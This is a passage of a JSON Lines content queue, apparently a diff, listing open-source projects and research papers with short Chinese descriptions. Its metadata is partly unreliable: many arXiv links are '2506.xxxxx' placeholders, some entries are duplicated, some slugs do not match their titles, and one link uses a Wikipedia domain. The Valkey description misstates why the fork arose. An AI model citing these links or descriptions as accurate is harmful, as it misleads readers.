高性能对象存储","url":"https://github.com/minio/minio","status":"written","meta":{"col3":"50000","col4":"S3 API 兼容,AI/数据湖/on-prem 对象存储事实标准"},"claimed_by":null} +{"slug":"chromadb","area":"projects","topic":"databases-storage","title":"Chroma — 嵌入式向量数据库","url":"https://github.com/chroma-core/chroma","status":"queued","meta":{"col3":"18000","col4":"Python 优先的 AI 原生向量库,RAG 原型到生产最短路径"}} +{"slug":"datafusion","area":"projects","topic":"databases-storage","title":"Apache DataFusion — Rust 查询引擎","url":"https://github.com/apache/datafusion","status":"queued","meta":{"col3":"7000","col4":"Arrow 之上可嵌入 SQL 引擎,DuckDB/Influx 3.0 的技术近亲"}} +{"slug":"materialize","area":"projects","topic":"databases-storage","title":"Materialize — 流式物化视图数据库","url":"https://github.com/MaterializeInc/materialize","status":"queued","meta":{"col3":"6000","col4":"增量视图维护,Kafka/CDC 之上实时 SQL 查询层"}} +{"slug":"kvrocks","area":"projects","topic":"databases-storage","title":"Apache Kvrocks — 磁盘型 Redis 兼容","url":"https://github.com/apache/kvrocks","status":"queued","meta":{"col3":"4000","col4":"RocksDB 之上 Redis 协议,大容量低成本缓存/存储"}} +{"slug":"keydb","area":"projects","topic":"databases-storage","title":"KeyDB — 多线程 Redis 分叉","url":"https://github.com/Snapchat/KeyDB","status":"queued","meta":{"col3":"9000","col4":"Redis 协议 + 多线程 + 主动复制,高吞吐内存 KV"}} +{"slug":"emscripten","area":"projects","topic":"wasm-toolchain","title":"Emscripten — LLVM 到 WebAssembly 编译器","url":"https://github.com/emscripten-core/emscripten","status":"queued","meta":{"col3":"27273","col4":"C/C++ 编译到 WASM,SDL/OpenGL 移植与 Web 游戏引擎基石"}} +{"slug":"binaryen","area":"projects","topic":"wasm-toolchain","title":"Binaryen — WASM 编译器基础设施","url":"https://github.com/WebAssembly/binaryen","status":"queued","meta":{"col3":"8497","col4":"wasm-opt/wasm-as 等工具集,WASM 优化与变换工业标准"}} +{"slug":"wabt","area":"projects","topic":"wasm-toolchain","title":"WABT — WebAssembly 二进制工具包","url":"https://github.com/WebAssembly/wabt","status":"queued","meta":{"col3":"7937","col4":"wat2wasm/wasm2c/wasm-decompile,WASM 文本/二进制互转"}} +{"slug":"extism","area":"projects","topic":"wasm-toolchain","title":"Extism — 通用 WASM 插件框架","url":"https://github.com/extism/extism","status":"queued","meta":{"col3":"5603","col4":"多语言宿主嵌入 WASM 插件,Serverless/CLI/浏览器统一接口"}} +{"slug":"wasm-pack","area":"projects","topic":"wasm-toolchain","title":"wasm-pack — Rust WASM 打包工具","url":"https://github.com/rustwasm/wasm-pack","status":"queued","meta":{"col3":"7155","col4":"Rust crate 一键发布 npm 包,wasm-bindgen 工作流标配"}} +{"slug":"wasm-tools","area":"projects","topic":"wasm-toolchain","title":"wasm-tools — WASM 底层操作 CLI","url":"https://github.com/bytecodealliance/wasm-tools","status":"queued","meta":{"col3":"1724","col4":"validate/parse/compose/component 全套,Component Model 开发利器"}} +{"slug":"wasi-sdk","area":"projects","topic":"wasm-toolchain","title":"wasi-sdk — WASM C/C++ 工具链","url":"https://github.com/WebAssembly/wasi-sdk","status":"queued","meta":{"col3":"1525","col4":"Clang + WASI libc 预编译 SDK,跨平台 WASM 原生编译"}} +{"slug":"jco","area":"projects","topic":"wasm-toolchain","title":"jco — JS WebAssembly Component 工具链","url":"https://github.com/bytecodealliance/jco","status":"queued","meta":{"col3":"941","col4":"WASM Component 转 ES 模块,Node/浏览器运行 WASI Command"}} +{"slug":"wasm-bindgen","area":"projects","topic":"wasm-toolchain","title":"wasm-bindgen — Rust WASM 绑定生成器","url":"https://github.com/rustwasm/wasm-bindgen","status":"queued","meta":{"col3":"8000","col4":"Rust 与 JS 互操作桥梁,web-sys/dom 类型安全绑定"}} +{"slug":"componentize-js","area":"projects","topic":"wasm-toolchain","title":"componentize-js — JS 转 WASM Component","url":"https://github.com/bytecodealliance/componentize-js","status":"queued","meta":{"col3":"600","col4":"把 JavaScript 函数打包成 WASM Component,跨语言组合"}} +{"slug":"lunatic","area":"projects","topic":"wasm-toolchain","title":"Lunatic — WASM 原生 Actor 运行时","url":"https://github.com/lunatic-solutions/lunatic","status":"queued","meta":{"col3":"4800","col4":"Erlang 风格轻量进程 + WASM 隔离,分布式后端新范式"}} +{"slug":"wit-bindgen","area":"projects","topic":"wasm-toolchain","title":"wit-bindgen — WIT 接口绑定生成器","url":"https://github.com/bytecodealliance/wit-bindgen","status":"queued","meta":{"col3":"1000","col4":"从 WIT 生成多语言 Component 绑定,Wasm 组件互操作核心"}} +{"slug":"cargo-component","area":"projects","topic":"wasm-toolchain","title":"cargo-component — Rust WASM Component 构建","url":"https://github.com/bytecodealliance/cargo-component","status":"queued","meta":{"col3":"800","col4":"Cargo 子命令构建 WASM Component,Rust 接入 Component Model"}} +{"slug":"tabby","area":"projects","topic":"data-science-ai","title":"Tabby","url":"https://github.com/TabbyML/tabby","status":"queued","meta":{"col3":"32000","col4":"自托管 AI 代码补全服务器,OpenAI 兼容 API,企业内网 Copilot 替代"}} +{"slug":"rayon","area":"projects","topic":"rust-tools","title":"rayon — Rust 数据并行库","url":"https://github.com/rayon-rs/rayon","status":"queued","meta":{"col3":"12000","col4":"工作窃取线程池 + 并行迭代器,CPU 密集 Rust 代码默认加速件"}} +{"slug":"crossbeam","area":"projects","topic":"rust-tools","title":"crossbeam — Rust 并发原语工具集","url":"https://github.com/crossbeam-rs/crossbeam","status":"queued","meta":{"col3":"8000","col4":"无锁队列/epoch GC/Scoped 线程,高级并发编程标准库扩展"}} +{"slug":"fuse","area":"projects","topic":"mobile-cross-platform","title":"Fuse — 跨平台原生 UI 工具包","url":"https://github.com/fuse-open/fuse","status":"queued","meta":{"col3":"1000","col4":"UX Markup 声明式 UI,编译到 iOS/Android 原生渲染"}} +{"slug":"gluestack-ui","area":"projects","topic":"mobile-cross-platform","title":"gluestack-ui — RN/Web 通用组件库","url":"https://github.com/gluestack/gluestack-ui","status":"queued","meta":{"col3":"4000","col4":"Tailwind 风格 + 跨 React/RN 的 headless 组件体系"}} +{"slug":"flet","area":"projects","topic":"mobile-cross-platform","title":"Flet — Python Flutter 风格 UI","url":"https://github.com/flet-dev/flet","status":"queued","meta":{"col3":"14000","col4":"Python 写 Flutter 应用,快速构建跨平台桌面/移动/Web UI"}} +{"slug":"beeware","area":"projects","topic":"mobile-cross-platform","title":"BeeWare — Python 原生应用工具链","url":"https://github.com/beeware/briefcase","status":"queued","meta":{"col3":"2000","col4":"Briefcase 打包 Python 到 iOS/Android/桌面原生应用"}} +{"slug":"apache-cassandra","area":"projects","topic":"databases-storage","title":"Apache Cassandra — 分布式宽列数据库","url":"https://github.com/apache/cassandra","status":"queued","meta":{"col3":"8000","col4":"Dynamo 论文工程化,P2P + 最终一致宽列存储鼻祖"}} +{"slug":"redb","area":"projects","topic":"databases-storage","title":"redb — 纯 Rust 嵌入式 KV","url":"https://github.com/cberner/redb","status":"queued","meta":{"col3":"3000","col4":"ACID 嵌入式 KV,API 简洁的 Rust 本地存储引擎"}} +{"slug":"wasm-micro-runtime","area":"projects","topic":"wasm-toolchain","title":"WAMR — 轻量 WASM 微运行时","url":"https://github.com/bytecodealliance/wasm-micro-runtime","status":"queued","meta":{"col3":"5500","col4":"C 实现、IoT 友好,AOT/JIT/解释三模式嵌入式 WASM 运行时"}} +{"slug":"mini-max-sparse-attention","area":"papers","topic":"LLM系统","title":"MiniMax Sparse Attention","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"MiniMax提出稀疏注意力机制,大幅提升长序列建模效率"}} +{"slug":"eureka-agent","area":"papers","topic":"智能体","title":"EurekAgent: Agent Environment Engineering is All You Need For Autonomous Scientific Discovery","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"清华提出智能体环境工程框架,实现自主科学发现"}} +{"slug":"weavebench","area":"papers","topic":"评测基准","title":"WeaveBench: A Long-Horizon, Real-World Benchmark for Computer-Use Agents","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"微软发布面向计算机使用智能体的长程真实世界基准"}} +{"slug":"spatialclaw","area":"papers","topic":"空间推理","title":"SpatialClaw: Rethinking Action Interface for Agentic Spatial Reasoning","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"NVIDIA重新设计智能体空间推理的动作接口"}} +{"slug":"interleave-thinker","area":"papers","topic":"智能体","title":"InterleaveThinker: Reinforcing Agentic Interleaved Generation","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"强化智能体交织生成能力,提升多模态推理表现"}} +{"slug":"robust-u1","area":"papers","topic":"多模态","title":"Robust-U1: Can MLLMs Self-Recover Corrupted Visual Content for Robust Understanding?","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"探究多模态大模型能否从受损视觉内容中自我恢复"}} +{"slug":"fort-searcher","area":"papers","topic":"搜索智能体","title":"FORT-Searcher: Synthesizing Shortcut-Resistant Search Tasks for Training Deep Search Agents","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"合成抗捷径搜索任务以训练深度搜索智能体"}} +{"slug":"maxproof","area":"papers","topic":"数学推理","title":"MaxProof: Scaling Mathematical Proof with Generative-Verifier RL and Population-Level Test-Time Scaling","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"MiniMax用生成-验证RL扩展数学证明规模"}} +{"slug":"labvla","area":"papers","topic":"机器人","title":"LabVLA: Grounding Vision-Language-Action Models in Scientific Laboratories","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"将视觉-语言-动作模型落地到科学实验室场景"}} +{"slug":"hydra-x","area":"papers","topic":"多模态","title":"HYDRA-X: Native Unified Multimodal Models with Holistic Visual Tokenizers","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"南京大学提出原生统一多模态模型与整体视觉分词器"}} +{"slug":"n-grpo","area":"papers","topic":"强化学习","title":"N-GRPO: Embedding-Level Neighbor Mixing for Enhanced Policy Optimization","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"在嵌入层进行邻居混合以增强策略优化"}} +{"slug":"evidence-memorization","area":"papers","topic":"LLM记忆","title":"EvoArena: Tracking Memory Evolution for Robust LLM Agents in Dynamic Environments","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"追踪LLM智能体在动态环境中记忆的演化过程"}} +{"slug":"moverse","area":"papers","topic":"视频生成","title":"MoVerse: Real-Time Video World Modeling with Panoramic Gaussian Scaffold","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"全景高斯脚手架实现实时视频世界建模"}} +{"slug":"video-mdm","area":"papers","topic":"动作生成","title":"VideoMDM: Towards 3D Human Motion Generation From 2D Supervision","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"从2D监督信号生成3D人类运动"}} +{"slug":"via-sd","area":"papers","topic":"推理加速","title":"VIA-SD: Verification via Intra-Model Routing for Speculative Decoding","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"通过模型内路由实现推测解码的验证"}} +{"slug":"maskalign","area":"papers","topic":"扩散模型","title":"MaskAlign: Token-Subset Representation Alignment for Efficient Diffusion Training","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"通过Token子集表示对齐提升扩散模型训练效率"}} +{"slug":"surflo","area":"papers","topic":"3D生成","title":"Surflo: Consistent 3D Surface Flow Model with Global State","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"带全局状态的连贯3D表面流模型"}} +{"slug":"ideal-ae","area":"papers","topic":"表示学习","title":"IDEAL: In-DEpth ALignment Makes A Discrete Representation AutoEncoder","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"深度对齐构建离散表示自编码器"}} +{"slug":"cold-start-safety","area":"papers","topic":"LLM安全","title":"The Cold-Start Safety Gap in LLM Agents","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"揭示LLM智能体冷启动阶段的安全差距"}} +{"slug":"tool-sense","area":"papers","topic":"工具学习","title":"ToolSense: A Diagnostic Framework for Auditing Parametric Tool Knowledge in LLMs","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"SAP提出审计LLM参数化工具知识的诊断框架"}} +{"slug":"weaver","area":"papers","topic":"机器人","title":"WEAVER: Better, Faster, Longer: An Effective World Model for Robotic Manipulation","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"更优更快更长的机器人操作世界模型"}} +{"slug":"infinite-llm","area":"papers","topic":"LLM系统","title":"Infinite-LLM: Efficient LLM Service for Long Context with DistAttention and Distributed KVCache","url":"https://arxiv.org/abs/2401.02669","status":"queued","meta":{"col3":"2024","col4":"用DistAttention和分布式KVCache实现超长上下文LLM服务"}} +{"slug":"gmlake","area":"papers","topic":"系统","title":"GMLake: Efficient and Transparent GPU Memory Defragmentation for Large-scale DNN Training","url":"https://arxiv.org/abs/2401.08156","status":"queued","meta":{"col3":"2024","col4":"ASPLOS24:GPU显存虚拟化拼接实现大规模训练碎片整理"}} +{"slug":"hackernews-frontpage-scrape","area":"papers","topic":"系统工具","title":"Hacker News Frontpage Data Collection Framework","url":"https://news.ycombinator.com/","status":"queued","meta":{"col3":"2024","col4":"Hacker News首页数据批量采集与分析框架"}} +{"slug":"altgen","area":"papers","topic":"无障碍","title":"AltGen: AI-Driven Alt Text Generation for Enhancing EPUB Accessibility","url":"https://arxiv.org/abs/2501.00113","status":"queued","meta":{"col3":"2025","col4":"AI驱动的EPUB无障碍替代文本生成"}} +{"slug":"mcp-solver","area":"papers","topic":"约束求解","title":"MCP-Solver: Integrating Language Models with Constraint Programming Systems","url":"https://arxiv.org/abs/2501.00539","status":"queued","meta":{"col3":"2025","col4":"将大语言模型与约束编程系统整合求解"}} +{"slug":"grade-inflation","area":"papers","topic":"模型评估","title":"Grade Inflation in Generative Models","url":"https://arxiv.org/abs/2501.00664","status":"queued","meta":{"col3":"2025","col4":"生成模型中的评分通胀现象分析"}} +{"slug":"agentrefine","area":"papers","topic":"智能体","title":"AgentRefine: Enhancing Agent Generalization through Refinement Tuning","url":"https://arxiv.org/abs/2501.01702","status":"queued","meta":{"col3":"2025","col4":"ICLR2025:通过微调增强智能体泛化能力"}} +{"slug":"video-of-thought","area":"papers","topic":"视频推理","title":"Video-of-Thought: Step-by-Step Video Reasoning from Perception to Cognition","url":"https://arxiv.org/abs/2501.03230","status":"queued","meta":{"col3":"2024","col4":"ICML2024:从感知到认知的逐步视频推理"}} +{"slug":"test-time-compute-survey","area":"papers","topic":"推理计算","title":"A Survey of Test-Time Compute: From Intuitive Inference to Deliberate Reasoning","url":"https://arxiv.org/abs/2501.02497","status":"queued","meta":{"col3":"2025","col4":"测试时计算全景综述:从直觉推理到深思熟虑"}} +{"slug":"low-rank-adapt-survey","area":"papers","topic":"微调","title":"Low-Rank Adaptation for Foundation Models: A Comprehensive Review","url":"https://arxiv.org/abs/2501.00365","status":"queued","meta":{"col3":"2025","col4":"基础模型低秩适应技术的全面综述"}} +{"slug":"agi-survey","area":"papers","topic":"AGI","title":"Large language models for artificial general intelligence (AGI): A survey","url":"https://arxiv.org/abs/2501.03151","status":"queued","meta":{"col3":"2025","col4":"AGI视角下大语言模型基础原理与路径综述"}} +{"slug":"diffusion-perceptual-loss","area":"papers","topic":"扩散模型","title":"Diffusion Model with Perceptual Loss","url":"https://arxiv.org/abs/2401.00110","status":"queued","meta":{"col3":"2024","col4":"引入感知损失的扩散模型改进方案"}} +{"slug":"discrete-dist-net","area":"papers","topic":"生成模型","title":"Discrete Distribution Networks","url":"https://arxiv.org/abs/2401.00036","status":"queued","meta":{"col3":"2024","col4":"ICLR2025:离散分布网络生成模型"}} +{"slug":"emage-gesture","area":"papers","topic":"姿态生成","title":"EMAGE: Towards Unified Holistic Co-Speech Gesture Generation","url":"https://arxiv.org/abs/2401.00374","status":"queued","meta":{"col3":"2024","col4":"CVPR2024:统一的整体协同语音手势生成"}} +{"slug":"stein-dreamer","area":"papers","topic":"3D生成","title":"SteinDreamer: Variance Reduction for Text-to-3D Score Distillation via Stein Identity","url":"https://arxiv.org/abs/2401.00604","status":"queued","meta":{"col3":"2024","col4":"用Stein恒等式降低文本到3D分数蒸馏的方差"}} +{"slug":"l3cube-mahasocial","area":"papers","topic":"知识图谱","title":"ReasoningLM: Enabling Structural Subgraph Reasoning in Pre-trained Language Models","url":"https://arxiv.org/abs/2401.00158","status":"queued","meta":{"col3":"2024","col4":"使预训练模型具备结构化子图推理能力"}} +{"slug":"improving-embeddings-llm","area":"papers","topic":"嵌入","title":"Improving Text Embeddings with Large Language Models","url":"https://arxiv.org/abs/2401.00368","status":"queued","meta":{"col3":"2024","col4":"ACL2024:用大语言模型提升文本嵌入质量"}} +{"slug":"ragtruth","area":"papers","topic":"RAG","title":"RAGTruth: A Hallucination Corpus for Developing Trustworthy Retrieval-Augmented Language Models","url":"https://arxiv.org/abs/2401.00396","status":"queued","meta":{"col3":"2024","col4":"构建幻觉语料库以开发可信检索增强模型"}} +{"slug":"unicron","area":"papers","topic":"LLM系统","title":"Unicron: Economizing Self-Healing LLM Training at Scale","url":"https://arxiv.org/abs/2401.00134","status":"queued","meta":{"col3":"2024","col4":"大规模LLM训练的自我修复与经济优化"}} +{"slug":"infinitts-llm","area":"papers","topic":"长上下文","title":"Infinite-LLM: Efficient LLM Service for Long Context with DistAttention and Distributed KVCache","url":"https://arxiv.org/abs/2401.02669","status":"queued","meta":{"col3":"2024","col4":"长上下文LLM服务:DistAttention+分布式KVCache"}} +{"slug":"hopper-dpo","area":"papers","topic":"对齐","title":"SDPO: Segment-Level Direct Preference Optimization for Social Agents","url":"https://arxiv.org/abs/2501.01821","status":"queued","meta":{"col3":"2025","col4":"社交智能体的分段级直接偏好优化"}} +{"slug":"mcp-survey","area":"papers","topic":"LLM架构","title":"From LLMs to MCPs: How Code Empowers Large Language Models to Serve as Intelligent Agents","url":"https://arxiv.org/abs/2401.00812","status":"queued","meta":{"col3":"2024","col4":"代码如何赋能LLM成为智能体的全面调研"}} +{"slug":"table-as-thought","area":"papers","topic":"推理","title":"Table as Thought: Exploring Structured Thoughts in LLM Reasoning","url":"https://arxiv.org/abs/2501.02152","status":"queued","meta":{"col3":"2025","col4":"表格即思维:探索LLM推理中的结构化思维"}} +{"slug":"cansat-survey","area":"papers","topic":"系统","title":"Modern Computing: Vision and Challenges","url":"https://arxiv.org/abs/2401.02469","status":"queued","meta":{"col3":"2024","col4":"现代计算全景:愿景与挑战"}} +{"slug":"hpc-dnn-heterogeneous","area":"papers","topic":"分布式训练","title":"HAP: SPMD DNN Training on Heterogeneous GPU Clusters with Automated Program Synthesis","url":"https://arxiv.org/abs/2401.05965","status":"queued","meta":{"col3":"2024","col4":"EuroSys24:异构GPU集群上自动程序合成的DNN训练"}} +{"slug":"xfer-diffusion-gnn","area":"papers","topic":"图学习","title":"diffIRM: A Diffusion-Augmented Invariant Risk Minimization Framework for Spatiotemporal Prediction over Graphs","url":"https://arxiv.org/abs/2501.00305","status":"queued","meta":{"col3":"2025","col4":"扩散增强的图时空预测不变风险最小化"}} +{"slug":"conformal-llm","area":"papers","topic":"置信预测","title":"Prune 'n Predict: Optimizing LLM Decision-making with Conformal Prediction","url":"https://arxiv.org/abs/2501.00555","status":"queued","meta":{"col3":"2025","col4":"ICML2025:用共形预测优化LLM决策"}} +{"slug":"fair-gnn","area":"papers","topic":"公平性","title":"Unbiased GNN Learning via Fairness-Aware Subgraph Diffusion","url":"https://arxiv.org/abs/2501.00595","status":"queued","meta":{"col3":"2025","col4":"通过公平感知子图扩散实现无偏图学习"}} +{"slug":"kolmogorov-autoencoder","area":"papers","topic":"表示学习","title":"KAE: Kolmogorov-Arnold Auto-Encoder for Representation Learning","url":"https://arxiv.org/abs/2501.00420","status":"queued","meta":{"col3":"2025","col4":"Kolmogorov-Arnold自编码器用于表示学习"}} +{"slug":"agentic-rl-survey","area":"papers","topic":"综述","title":"A Survey of Test-Time Compute: From Intuitive Inference to Deliberate Reasoning","url":"https://arxiv.org/abs/2501.02497","status":"queued","meta":{"col3":"2025","col4":"测试时计算全面综述"}} +{"slug":"multimodal-llm-steering","area":"papers","topic":"多模态","title":"Analyzing Finetuning Representation Shift for Multimodal LLMs Steering","url":"https://arxiv.org/abs/2501.03012","status":"queued","meta":{"col3":"2025","col4":"ICCV2025:微调表示偏移分析以指导多模态LLM"}} +{"slug":"kg-cf","area":"papers","topic":"知识图谱","title":"KG-CF: Knowledge Graph Completion with Context Filtering under LLM Guidance","url":"https://arxiv.org/abs/2501.02711","status":"queued","meta":{"col3":"2025","col4":"LLM引导下的知识图谱补全与上下文过滤"}} +{"slug":"calm-audit","area":"papers","topic":"LLM对齐","title":"CALM: Curiosity-Driven Auditing for Large Language Models","url":"https://arxiv.org/abs/2501.02997","status":"queued","meta":{"col3":"2025","col4":"AAAI2025:好奇心驱动的LLM审计方法"}} +{"slug":"form-reward-machines","area":"papers","topic":"强化学习","title":"FORM: Learning Expressive and Transferable First-Order Logic Reward Machines","url":"https://arxiv.org/abs/2501.00364","status":"queued","meta":{"col3":"2025","col4":"AAMAS2025:一阶逻辑奖励机器的学习与迁移"}} +{"slug":"prob-mission-uas","area":"papers","topic":"神经符号","title":"Probabilistic Mission Design for Neuro-Symbolic Unmanned Aircraft Systems","url":"https://arxiv.org/abs/2501.01439","status":"queued","meta":{"col3":"2025","col4":"神经符号无人机的概率任务设计"}} +{"slug":"mcp-solver-cp","area":"papers","topic":"约束编程","title":"MCP-Solver: Integrating Language Models with Constraint Programming Systems","url":"https://arxiv.org/abs/2501.00539","status":"queued","meta":{"col3":"2025","col4":"语言模型与约束编程系统的整合"}} +{"slug":"moonshot-bft","area":"papers","topic":"分布式共识","title":"Moonshot: Optimizing Chain-Based Rotating Leader BFT via Optimistic Proposals","url":"https://arxiv.org/abs/2401.01791","status":"queued","meta":{"col3":"2024","col4":"优化基于链的轮转领导者BFT共识协议"}} +{"slug":"iot-generative-ai","area":"papers","topic":"物联网","title":"The Internet of Things in the Era of Generative AI: Vision and Challenges","url":"https://arxiv.org/abs/2401.01923","status":"queued","meta":{"col3":"2024","col4":"生成AI时代物联网的愿景与挑战"}} +{"slug":"cloud-native-resource","area":"papers","topic":"云原生","title":"Analytically-Driven Resource Management for Cloud-Native Microservices","url":"https://arxiv.org/abs/2401.02920","status":"queued","meta":{"col3":"2024","col4":"云原生微服务的解析驱动资源管理"}} +{"slug":"polytopes-scheduler","area":"papers","topic":"编译调度","title":"PolyTOPS: Reconfigurable and Flexible Polyhedral Scheduler","url":"https://arxiv.org/abs/2401.06665","status":"queued","meta":{"col3":"2024","col4":"CGO2024:可重构的多面体调度器"}} +{"slug":"parallel-kcore","area":"papers","topic":"图算法","title":"Parallel k-Core Decomposition with Batched Updates and Asynchronous Reads","url":"https://arxiv.org/abs/2401.08015","status":"queued","meta":{"col3":"2024","col4":"PPoPP2024:带批量更新和异步读的并行k核分解"}} +{"slug":"harnessbridge","area":"papers","topic":"智能体","title":"HarnessBridge: Learnable Bidirectional Controller for LLM Agent Harness","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"UCLA提出LLM智能体操控的可学习双向控制器"}} +{"slug":"evo-flux","area":"papers","topic":"智能体","title":"Evoflux: Inference-Time Evolution of Executable Tool Workflows for Compact Agents","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"IBM:推理时进化可执行工具工作流以构建紧凑智能体"}} +{"slug":"tree-seeker","area":"papers","topic":"搜索","title":"TreeSeeker: Tree-Structured Trial, Error, and Return in Deep Search","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"树结构试错与回溯的深度搜索方法"}} +{"slug":"visual-para-thinker","area":"papers","topic":"视觉推理","title":"Visual Para-Thinker++: A Single-Policy Multi-Agent Framework for Visual Reasoning","url":"https://ar.wikipedia.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"单策略多智能体视觉推理框架"}} +{"slug":"high-fidelity-distill","area":"papers","topic":"图像生成","title":"High-Fidelity Two-Step Image Generation via Teacher-Aligned End-to-End Distillation","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"通义实验室:教师对齐端到端蒸馏的高保真图像生成"}} +{"slug":"risk-pressure","area":"papers","topic":"安全","title":"Risk Under Pressure: Compute-Aware Evaluation of Adversarial Robustness in Language Models","url":"https://arxiv.org/abs/2506.xxxxx","status":"queued","meta":{"col3":"2025","col4":"计算感知的对抗鲁棒性评估"}} +{"slug":"langgraph","area":"projects","topic":"ai-agent-frameworks","title":"LangGraph — LangChain 的状态机 Agent 框架","url":"https://github.com/langchain-ai/langgraph","status":"queued","meta":{"col3":"27000","col4":"有向图状态机编排多步 Agent 流程,生产级可靠性,取代 ReAct 链式调用"}} +{"slug":"llama-cpp","area":"projects","topic":"ai-agent-frameworks","title":"llama.cpp — 纯 C/C++ LLM 推理引擎","url":"https://github.com/ggerganov/llama.cpp","status":"queued","meta":{"col3":"85000","col4":"CPU-only 跑 LLaMA 系列,GGUF 量化格式标准,MPS/NPU 硬件加速全覆盖"}} +{"slug":"ollama","area":"projects","topic":"ai-agent-frameworks","title":"Ollama — 本地 LLM 一键运行平台","url":"https://github.com/ollama/ollama","status":"queued","meta":{"col3":"130000","col4":"一行命令跑 Llama/Gemma/Mistral;Modelfile + API 双层抽象,LLM 界的 Docker"}} +{"slug":"autogen","area":"projects","topic":"ai-agent-frameworks","title":"AutoGen — Microsoft 多 Agent 对话框架","url":"https://github.com/microsoft/autogen","status":"queued","meta":{"col3":"42000","col4":"Agent 之间互相发消息完成任务;GroupChat 模式让多个 LLM 角色辩论解决问题"}} +{"slug":"crewai","area":"projects","topic":"ai-agent-frameworks","title":"CrewAI — 角色扮演式多 Agent 编排","url":"https://github.com/crewAIInc/crewAI","status":"queued","meta":{"col3":"30000","col4":"给每个 Agent 设角色/目标/工具,像真实团队一样分工协作完成复杂任务"}} +{"slug":"smolagents","area":"projects","topic":"ai-agent-frameworks","title":"SMOL Agents — HuggingFace 轻量 Agent 框架","url":"https://github.com/huggingface/smolagents","status":"queued","meta":{"col3":"15000","col4":"500 行代码的极简 Agent 框架;code-first 工具调用,理解 Agent 最佳入门"}} +{"slug":"open-webui","area":"projects","topic":"ai-agent-frameworks","title":"Open WebUI — Ollama 的 Web 前端","url":"https://github.com/open-webui/open-webui","status":"queued","meta":{"col3":"65000","col4":"自托管 ChatGPT 界面,对接 Ollama/Llama.cpp;插件系统 + 知识库检索"}} +{"slug":"copilotkit","area":"projects","topic":"ai-agent-frameworks","title":"CopilotKit — 前端 Agent UI 组件库","url":"https://github.com/CopilotKit/CopilotKit","status":"queued","meta":{"col3":"35000","col4":"React/Angular/Mobile 的 Agent UI 组件;AG-UI 协议标准化前端与 LLM 交互"}} +{"slug":"agent-ai","area":"projects","topic":"ai-agent-frameworks","title":"Agent AI — 多 LLM 聚合对话客户端","url":"https://github.com/ag2ai/ag2","status":"queued","meta":{"col3":"5000","col4":"聚合 ChatGPT/Claude/Gemini 等多个 LLM 到一个聊天界面"}} +{"slug":"polars","area":"projects","topic":"databases","title":"Polars — Rust 编写的高性能 DataFrame 库","url":"https://github.com/pola-rs/polars","status":"queued","meta":{"col3":"30000","col4":"Lazy 执行计划 + SIMD 向量化;pandas 的 10-100 倍加速替代"}} +{"slug":"clickhouse","area":"projects","topic":"databases","title":"ClickHouse — Yandex 的列式分析数据库","url":"https://github.com/ClickHouse/ClickHouse","status":"queued","meta":{"col3":"32000","col4":"实时 OLAP 查询之王;TB 级数据亚秒级响应,Sberbank/Cloudflare 生产验证"}} +{"slug":"redpanda","area":"projects","topic":"databases","title":"Redpanda — Kafka 兼容的无 JVM 消息队列","url":"https://github.com/redpanda-data/redpanda","status":"queued","meta":{"col3":"18000","col4":"C++ 重写,去掉 JVM 开销;Kafka API 兼容,运维复杂度降一个数量级"}} +{"slug":"valkey","area":"projects","topic":"databases","title":"Valkey — Linux 基金会托管的 Redis 分支","url":"https://github.com/valkey-io/valkey","status":"queued","meta":{"col3":"12000","col4":"AWS 放弃 Redis 开源后社区接管;保持协议兼容,Linux 基金会治理"}} +{"slug":"swc-project-swc","area":"projects","topic":"frontend-frameworks","title":"SWC — Rust 编写的极速 JS 编译器","url":"https://github.com/swc-project/swc","status":"queued","meta":{"col3":"34000","col4":"Babel 的 20x 加速替代;Next.js/Vercel 生态核心,Rust 工具链标杆"}} +{"slug":"rolldown","area":"projects","topic":"frontend-frameworks","title":"Rolldown — Rust 编写的 Rollup 兼容打包器","url":"https://github.com/rolldown/rolldown","status":"queued","meta":{"col3":"14000","col4":"Rollup API 兼容的 Rust 打包器;Rust 生态 + JS 生态的桥梁"}} +{"slug":"leptos","area":"projects","topic":"frontend-frameworks","title":"Leptos — Rust/WASM 全栈 Web 框架","url":"https://github.com/leptos-rs/leptos","status":"queued","meta":{"col3":"22000","col4":"细粒度响应式 + SSR;Rust 编译到 WASM 跑在前端的完整栈框架"}} +{"slug":"dioxus","area":"projects","topic":"frontend-frameworks","title":"Dioxus — Rust 跨平台 UI 